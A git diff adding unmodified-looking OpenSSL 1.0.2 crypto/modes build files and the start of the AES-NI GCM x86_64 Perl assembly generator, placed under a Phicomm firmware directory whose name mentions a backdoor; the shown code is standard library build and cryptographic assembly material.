+	$(PERL) asm/ghashv8-armx.pl $(PERLASM_SCHEME) $@
+ghashp8-ppc.s:	asm/ghashp8-ppc.pl
+	$(PERL) asm/ghashp8-ppc.pl $(PERLASM_SCHEME) $@
+
+# GNU make "catch all"
+ghash-%.S:	asm/ghash-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+ghash-armv4.o:	ghash-armv4.S
+ghashv8-armx.o:	ghashv8-armx.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cbc128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cbc128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cbc128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cbc128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cbc128.o: ../../include/openssl/symhacks.h cbc128.c modes_lcl.h
+ccm128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ccm128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ccm128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ccm128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ccm128.o: ../../include/openssl/symhacks.h ccm128.c modes_lcl.h
+cfb128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cfb128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cfb128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cfb128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cfb128.o: ../../include/openssl/symhacks.h cfb128.c modes_lcl.h
+ctr128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ctr128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ctr128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ctr128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ctr128.o: ../../include/openssl/symhacks.h ctr128.c modes_lcl.h
+cts128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cts128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cts128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cts128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cts128.o: ../../include/openssl/symhacks.h cts128.c modes_lcl.h
+gcm128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+gcm128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+gcm128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gcm128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+gcm128.o: ../../include/openssl/symhacks.h gcm128.c modes_lcl.h
+ofb128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ofb128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ofb128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ofb128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ofb128.o: ../../include/openssl/symhacks.h modes_lcl.h ofb128.c
+wrap128.o: ../../e_os.h ../../include/openssl/bio.h
+wrap128.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+wrap128.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+wrap128.o: ../../include/openssl/lhash.h ../../include/openssl/modes.h
+wrap128.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+wrap128.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+wrap128.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+wrap128.o: ../cryptlib.h wrap128.c
+xts128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+xts128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+xts128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+xts128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+xts128.o: ../../include/openssl/symhacks.h modes_lcl.h xts128.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile.save
new file mode 100644
index 0000000..cbcbfad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/Makefile.save
@@ -0,0 +1,158 @@
+#
+# OpenSSL/crypto/modes/Makefile
+#
+
+DIR=	modes
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+MODES_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= cbc128.c ctr128.c cts128.c cfb128.c ofb128.c gcm128.c \
+	ccm128.c xts128.c wrap128.c
+LIBOBJ= cbc128.o ctr128.o cts128.o cfb128.o ofb128.o gcm128.o \
+	ccm128.o xts128.o wrap128.o $(MODES_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+#EXHEADER= store.h str_compat.h
+EXHEADER= modes.h
+HEADER=	modes_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+ghash-ia64.s:	asm/ghash-ia64.pl
+	$(PERL) asm/ghash-ia64.pl $@ $(CFLAGS)
+ghash-x86.s:	asm/ghash-x86.pl
+	$(PERL) asm/ghash-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+ghash-x86_64.s:	asm/ghash-x86_64.pl
+	$(PERL) asm/ghash-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-gcm-x86_64.s:	asm/aesni-gcm-x86_64.pl
+	$(PERL) asm/aesni-gcm-x86_64.pl $(PERLASM_SCHEME) > $@
+ghash-sparcv9.s:	asm/ghash-sparcv9.pl
+	$(PERL) asm/ghash-sparcv9.pl $@ $(CFLAGS)
+ghash-alpha.s:	asm/ghash-alpha.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/ghash-alpha.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+ghash-parisc.s:	asm/ghash-parisc.pl
+	$(PERL) asm/ghash-parisc.pl $(PERLASM_SCHEME) $@
+ghashv8-armx.S:	asm/ghashv8-armx.pl
+	$(PERL) asm/ghashv8-armx.pl $(PERLASM_SCHEME) $@
+ghashp8-ppc.s:	asm/ghashp8-ppc.pl
+	$(PERL) asm/ghashp8-ppc.pl $(PERLASM_SCHEME) $@
+
+# GNU make "catch all"
+ghash-%.S:	asm/ghash-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+ghash-armv4.o:	ghash-armv4.S
+ghashv8-armx.o:	ghashv8-armx.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cbc128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cbc128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cbc128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cbc128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cbc128.o: ../../include/openssl/symhacks.h cbc128.c modes_lcl.h
+ccm128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ccm128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ccm128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ccm128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ccm128.o: ../../include/openssl/symhacks.h ccm128.c modes_lcl.h
+cfb128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cfb128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cfb128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cfb128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cfb128.o: ../../include/openssl/symhacks.h cfb128.c modes_lcl.h
+ctr128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ctr128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ctr128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ctr128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ctr128.o: ../../include/openssl/symhacks.h ctr128.c modes_lcl.h
+cts128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+cts128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+cts128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cts128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cts128.o: ../../include/openssl/symhacks.h cts128.c modes_lcl.h
+gcm128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+gcm128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+gcm128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gcm128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+gcm128.o: ../../include/openssl/symhacks.h gcm128.c modes_lcl.h
+ofb128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ofb128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+ofb128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ofb128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ofb128.o: ../../include/openssl/symhacks.h modes_lcl.h ofb128.c
+wrap128.o: ../../e_os.h ../../include/openssl/bio.h
+wrap128.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+wrap128.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+wrap128.o: ../../include/openssl/lhash.h ../../include/openssl/modes.h
+wrap128.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+wrap128.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+wrap128.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+wrap128.o: ../cryptlib.h wrap128.c
+xts128.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+xts128.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+xts128.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+xts128.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+xts128.o: ../../include/openssl/symhacks.h modes_lcl.h xts128.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/aesni-gcm-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/aesni-gcm-x86_64.pl
new file mode 100644
index 0000000..7e4e04e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/aesni-gcm-x86_64.pl
@@ -0,0 +1,1057 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+#
+# AES-NI-CTR+GHASH stitch.
+#
+# February 2013
+#
+# OpenSSL GCM implementation is organized in such way that its
+# performance is rather close to the sum of its streamed components,
+# in the context parallelized AES-NI CTR and modulo-scheduled
+# PCLMULQDQ-enabled GHASH. Unfortunately, as no stitch implementation
+# was observed to perform significantly better than the sum of the
+# components on contemporary CPUs, the effort was deemed impossible to
+# justify. This module is based on combination of Intel submissions,
+# [1] and [2], with MOVBE twist suggested by Ilya Albrekht and Max
+# Locktyukhin of Intel Corp. who verified that it reduces shuffles
+# pressure with notable relative improvement, achieving 1.0 cycle per
+# byte processed with 128-bit key on Haswell processor, and 0.74 -
+# on Broadwell. [Mentioned results are raw profiled measurements for
+# favourable packet size, one divisible by 96. Applications using the
+# EVP interface will observe a few percent worse performance.]
+#
+# [1] http://rt.openssl.org/Ticket/Display.html?id=2900&user=guest&pass=guest
+# [2] http://www.intel.com/content/dam/www/public/us/en/documents/software-support/enabling-high-performance-gcm.pdf
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+if ($avx>1) {{{
+
+($inp,$out,$len,$key,$ivp,$Xip)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9");
+
+($Ii,$T1,$T2,$Hkey,
+ $Z0,$Z1,$Z2,$Z3,$Xi) = map("%xmm$_",(0..8));
+
+($inout0,$inout1,$inout2,$inout3,$inout4,$inout5,$rndkey) = map("%xmm$_",(9..15));
+
+($counter,$rounds,$ret,$const,$in0,$end0)=("%ebx","%ebp","%r10","%r11","%r14","%r15");
+
+$code=<<___;
+.text
+
+.type	_aesni_ctr32_ghash_6x,\@abi-omnipotent
+.align	32
+_aesni_ctr32_ghash_6x:
+	vmovdqu		0x20($const),$T2	# borrow $T2, .Lone_msb
+	sub		\$6,$len
+	vpxor		$Z0,$Z0,$Z0		# $Z0   = 0
+	vmovdqu		0x00-0x80($key),$rndkey
+	vpaddb		$T2,$T1,$inout1
+	vpaddb		$T2,$inout1,$inout2
+	vpaddb		$T2,$inout2,$inout3
+	vpaddb		$T2,$inout3,$inout4
+	vpaddb		$T2,$inout4,$inout5
+	vpxor		$rndkey,$T1,$inout0
+	vmovdqu		$Z0,16+8(%rsp)		# "$Z3" = 0
+	jmp		.Loop6x
+
+.align	32
+.Loop6x:
+	add		\$`6<<24`,$counter
+	jc		.Lhandle_ctr32		# discard $inout[1-5]?
+	vmovdqu		0x00-0x20($Xip),$Hkey	# $Hkey^1
+	  vpaddb	$T2,$inout5,$T1		# next counter value
+	  vpxor		$rndkey,$inout1,$inout1
+	  vpxor		$rndkey,$inout2,$inout2
+
+.Lresume_ctr32:
+	vmovdqu		$T1,($ivp)		# save next counter value
+	vpclmulqdq	\$0x10,$Hkey,$Z3,$Z1
+	  vpxor		$rndkey,$inout3,$inout3
+	  vmovups	0x10-0x80($key),$T2	# borrow $T2 for $rndkey
+	vpclmulqdq	\$0x01,$Hkey,$Z3,$Z2
+	xor		%r12,%r12
+	cmp		$in0,$end0
+
+	  vaesenc	$T2,$inout0,$inout0
+	vmovdqu		0x30+8(%rsp),$Ii	# I[4]
+	  vpxor		$rndkey,$inout4,$inout4
+	vpclmulqdq	\$0x00,$Hkey,$Z3,$T1
+	  vaesenc	$T2,$inout1,$inout1
+	  vpxor		$rndkey,$inout5,$inout5
+	setnc		%r12b
+	vpclmulqdq	\$0x11,$Hkey,$Z3,$Z3
+	  vaesenc	$T2,$inout2,$inout2
+	vmovdqu		0x10-0x20($Xip),$Hkey	# $Hkey^2
+	neg		%r12
+	  vaesenc	$T2,$inout3,$inout3
+	 vpxor		$Z1,$Z2,$Z2
+	vpclmulqdq	\$0x00,$Hkey,$Ii,$Z1
+	 vpxor		$Z0,$Xi,$Xi		# modulo-scheduled
+	  vaesenc	$T2,$inout4,$inout4
+	 vpxor		$Z1,$T1,$Z0
+	and		\$0x60,%r12
+	  vmovups	0x20-0x80($key),$rndkey
+	vpclmulqdq	\$0x10,$Hkey,$Ii,$T1
+	  vaesenc	$T2,$inout5,$inout5
+
+	vpclmulqdq	\$0x01,$Hkey,$Ii,$T2
+	lea		($in0,%r12),$in0
+	  vaesenc	$rndkey,$inout0,$inout0
+	 vpxor		16+8(%rsp),$Xi,$Xi	# modulo-scheduled [vpxor $Z3,$Xi,$Xi]
+	vpclmulqdq	\$0x11,$Hkey,$Ii,$Hkey
+	 vmovdqu	0x40+8(%rsp),$Ii	# I[3]
+	  vaesenc	$rndkey,$inout1,$inout1
+	movbe		0x58($in0),%r13
+	  vaesenc	$rndkey,$inout2,$inout2
+	movbe		0x50($in0),%r12
+	  vaesenc	$rndkey,$inout3,$inout3
+	mov		%r13,0x20+8(%rsp)
+	  vaesenc	$rndkey,$inout4,$inout4
+	mov		%r12,0x28+8(%rsp)
+	vmovdqu		0x30-0x20($Xip),$Z1	# borrow $Z1 for $Hkey^3
+	  vaesenc	$rndkey,$inout5,$inout5
+
+	  vmovups	0x30-0x80($key),$rndkey
+	 vpxor		$T1,$Z2,$Z2
+	vpclmulqdq	\$0x00,$Z1,$Ii,$T1
+	  vaesenc	$rndkey,$inout0,$inout0
+	 vpxor		$T2,$Z2,$Z2
+	vpclmulqdq	\$0x10,$Z1,$Ii,$T2
+	  vaesenc	$rndkey,$inout1,$inout1
+	 vpxor		$Hkey,$Z3,$Z3
+	vpclmulqdq	\$0x01,$Z1,$Ii,$Hkey
+	  vaesenc	$rndkey,$inout2,$inout2
+	vpclmulqdq	\$0x11,$Z1,$Ii,$Z1
+	 vmovdqu	0x50+8(%rsp),$Ii	# I[2]
+	  vaesenc	$rndkey,$inout3,$inout3
+	  vaesenc	$rndkey,$inout4,$inout4
+	 vpxor		$T1,$Z0,$Z0
+	vmovdqu		0x40-0x20($Xip),$T1	# borrow $T1 for $Hkey^4
+	  vaesenc	$rndkey,$inout5,$inout5
+
+	  vmovups	0x40-0x80($key),$rndkey
+	 vpxor		$T2,$Z2,$Z2
+	vpclmulqdq	\$0x00,$T1,$Ii,$T2
+	  vaesenc	$rndkey,$inout0,$inout0
+	 vpxor		$Hkey,$Z2,$Z2
+	vpclmulqdq	\$0x10,$T1,$Ii,$Hkey
+	  vaesenc	$rndkey,$inout1,$inout1
+	movbe		0x48($in0),%r13
+	 vpxor		$Z1,$Z3,$Z3
+	vpclmulqdq	\$0x01,$T1,$Ii,$Z1
+	  vaesenc	$rndkey,$inout2,$inout2
+	movbe		0x40($in0),%r12
+	vpclmulqdq	\$0x11,$T1,$Ii,$T1
+	 vmovdqu	0x60+8(%rsp),$Ii	# I[1]
+	  vaesenc	$rndkey,$inout3,$inout3
+	mov		%r13,0x30+8(%rsp)
+	  vaesenc	$rndkey,$inout4,$inout4
+	mov		%r12,0x38+8(%rsp)
+	 vpxor		$T2,$Z0,$Z0
+	vmovdqu		0x60-0x20($Xip),$T2	# borrow $T2 for $Hkey^5
+	  vaesenc	$rndkey,$inout5,$inout5
+
+	  vmovups	0x50-0x80($key),$rndkey
+	 vpxor		$Hkey,$Z2,$Z2
+	vpclmulqdq	\$0x00,$T2,$Ii,$Hkey
+	  vaesenc	$rndkey,$inout0,$inout0
+	 vpxor		$Z1,$Z2,$Z2
+	vpclmulqdq	\$0x10,$T2,$Ii,$Z1
+	  vaesenc	$rndkey,$inout1,$inout1
+	movbe		0x38($in0),%r13
+	 vpxor		$T1,$Z3,$Z3
+	vpclmulqdq	\$0x01,$T2,$Ii,$T1
+	 vpxor		0x70+8(%rsp),$Xi,$Xi	# accumulate I[0]
+	  vaesenc	$rndkey,$inout2,$inout2
+	movbe		0x30($in0),%r12
+	vpclmulqdq	\$0x11,$T2,$Ii,$T2
+	  vaesenc	$rndkey,$inout3,$inout3
+	mov		%r13,0x40+8(%rsp)
+	  vaesenc	$rndkey,$inout4,$inout4
+	mov		%r12,0x48+8(%rsp)
+	 vpxor		$Hkey,$Z0,$Z0
+	 vmovdqu	0x70-0x20($Xip),$Hkey	# $Hkey^6
+	  vaesenc	$rndkey,$inout5,$inout5
+
+	  vmovups	0x60-0x80($key),$rndkey
+	 vpxor		$Z1,$Z2,$Z2
+	vpclmulqdq	\$0x10,$Hkey,$Xi,$Z1
+	  vaesenc	$rndkey,$inout0,$inout0
+	 vpxor		$T1,$Z2,$Z2
+	vpclmulqdq	\$0x01,$Hkey,$Xi,$T1
+	  vaesenc	$rndkey,$inout1,$inout1
+	movbe		0x28($in0),%r13
+	 vpxor		$T2,$Z3,$Z3
+	vpclmulqdq	\$0x00,$Hkey,$Xi,$T2
+	  vaesenc	$rndkey,$inout2,$inout2
+	movbe		0x20($in0),%r12
+	vpclmulqdq	\$0x11,$Hkey,$Xi,$Xi
+	  vaesenc	$rndkey,$inout3,$inout3
+	mov		%r13,0x50+8(%rsp)
+	  vaesenc	$rndkey,$inout4,$inout4
+	mov		%r12,0x58+8(%rsp)
+	vpxor		$Z1,$Z2,$Z2
+	  vaesenc	$rndkey,$inout5,$inout5
+	vpxor		$T1,$Z2,$Z2
+
+	  vmovups	0x70-0x80($key),$rndkey
+	vpslldq		\$8,$Z2,$Z1
+	vpxor		$T2,$Z0,$Z0
+	vmovdqu		0x10($const),$Hkey	# .Lpoly
+
+	  vaesenc	$rndkey,$inout0,$inout0
+	vpxor		$Xi,$Z3,$Z3
+	  vaesenc	$rndkey,$inout1,$inout1
+	vpxor		$Z1,$Z0,$Z0
+	movbe		0x18($in0),%r13
+	  vaesenc	$rndkey,$inout2,$inout2
+	movbe		0x10($in0),%r12
+	vpalignr	\$8,$Z0,$Z0,$Ii		# 1st phase
+	vpclmulqdq	\$0x10,$Hkey,$Z0,$Z0
+	mov		%r13,0x60+8(%rsp)
+	  vaesenc	$rndkey,$inout3,$inout3
+	mov		%r12,0x68+8(%rsp)
+	  vaesenc	$rndkey,$inout4,$inout4
+	  vmovups	0x80-0x80($key),$T1	# borrow $T1 for $rndkey
+	  vaesenc	$rndkey,$inout5,$inout5
+
+	  vaesenc	$T1,$inout0,$inout0
+	  vmovups	0x90-0x80($key),$rndkey
+	  vaesenc	$T1,$inout1,$inout1
+	vpsrldq		\$8,$Z2,$Z2
+	  vaesenc	$T1,$inout2,$inout2
+	vpxor		$Z2,$Z3,$Z3
+	  vaesenc	$T1,$inout3,$inout3
+	vpxor		$Ii,$Z0,$Z0
+	movbe		0x08($in0),%r13
+	  vaesenc	$T1,$inout4,$inout4
+	movbe		0x00($in0),%r12
+	  vaesenc	$T1,$inout5,$inout5
+	  vmovups	0xa0-0x80($key),$T1
+	  cmp		\$11,$rounds
+	  jb		.Lenc_tail		# 128-bit key
+
+	  vaesenc	$rndkey,$inout0,$inout0
+	  vaesenc	$rndkey,$inout1,$inout1
+	  vaesenc	$rndkey,$inout2,$inout2
+	  vaesenc	$rndkey,$inout3,$inout3
+	  vaesenc	$rndkey,$inout4,$inout4
+	  vaesenc	$rndkey,$inout5,$inout5
+
+	  vaesenc	$T1,$inout0,$inout0
+	  vaesenc	$T1,$inout1,$inout1
+	  vaesenc	$T1,$inout2,$inout2
+	  vaesenc	$T1,$inout3,$inout3
+	  vaesenc	$T1,$inout4,$inout4
+	  vmovups	0xb0-0x80($key),$rndkey
+	  vaesenc	$T1,$inout5,$inout5
+	  vmovups	0xc0-0x80($key),$T1
+	  je		.Lenc_tail		# 192-bit key
+
+	  vaesenc	$rndkey,$inout0,$inout0
+	  vaesenc	$rndkey,$inout1,$inout1
+	  vaesenc	$rndkey,$inout2,$inout2
+	  vaesenc	$rndkey,$inout3,$inout3
+	  vaesenc	$rndkey,$inout4,$inout4
+	  vaesenc	$rndkey,$inout5,$inout5
+
+	  vaesenc	$T1,$inout0,$inout0
+	  vaesenc	$T1,$inout1,$inout1
+	  vaesenc	$T1,$inout2,$inout2
+	  vaesenc	$T1,$inout3,$inout3
+	  vaesenc	$T1,$inout4,$inout4
+	  vmovups	0xd0-0x80($key),$rndkey
+	  vaesenc	$T1,$inout5,$inout5
+	  vmovups	0xe0-0x80($key),$T1
+	  jmp		.Lenc_tail		# 256-bit key
+
+.align	32
+.Lhandle_ctr32:
+	vmovdqu		($const),$Ii		# borrow $Ii for .Lbswap_mask
+	  vpshufb	$Ii,$T1,$Z2		# byte-swap counter
+	  vmovdqu	0x30($const),$Z1	# borrow $Z1, .Ltwo_lsb
+	  vpaddd	0x40($const),$Z2,$inout1	# .Lone_lsb
+	  vpaddd	$Z1,$Z2,$inout2
+	vmovdqu		0x00-0x20($Xip),$Hkey	# $Hkey^1
+	  vpaddd	$Z1,$inout1,$inout3
+	  vpshufb	$Ii,$inout1,$inout1
+	  vpaddd	$Z1,$inout2,$inout4
+	  vpshufb	$Ii,$inout2,$inout2
+	  vpxor		$rndkey,$inout1,$inout1
+	  vpaddd	$Z1,$inout3,$inout5
+	  vpshufb	$Ii,$inout3,$inout3
+	  vpxor		$rndkey,$inout2,$inout2
+	  vpaddd	$Z1,$inout4,$T1		# byte-swapped next counter value
+	  vpshufb	$Ii,$inout4,$inout4
+	  vpshufb	$Ii,$inout5,$inout5
+	  vpshufb	$Ii,$T1,$T1		# next counter value
+	jmp		.Lresume_ctr32
+
+.align	32
+.Lenc_tail:
+	  vaesenc	$rndkey,$inout0,$inout0
+	vmovdqu		$Z3,16+8(%rsp)		# postpone vpxor $Z3,$Xi,$Xi
+	vpalignr	\$8,$Z0,$Z0,$Xi		# 2nd phase
+	  vaesenc	$rndkey,$inout1,$inout1
+	vpclmulqdq	\$0x10,$Hkey,$Z0,$Z0
+	  vpxor		0x00($inp),$T1,$T2
+	  vaesenc	$rndkey,$inout2,$inout2
+	  vpxor		0x10($inp),$T1,$Ii
+	  vaesenc	$rndkey,$inout3,$inout3
+	  vpxor		0x20($inp),$T1,$Z1
+	  vaesenc	$rndkey,$inout4,$inout4
+	  vpxor		0x30($inp),$T1,$Z2
+	  vaesenc	$rndkey,$inout5,$inout5
+	  vpxor		0x40($inp),$T1,$Z3
+	  vpxor		0x50($inp),$T1,$Hkey
+	  vmovdqu	($ivp),$T1		# load next counter value
+
+	  vaesenclast	$T2,$inout0,$inout0
+	  vmovdqu	0x20($const),$T2	# borrow $T2, .Lone_msb
+	  vaesenclast	$Ii,$inout1,$inout1
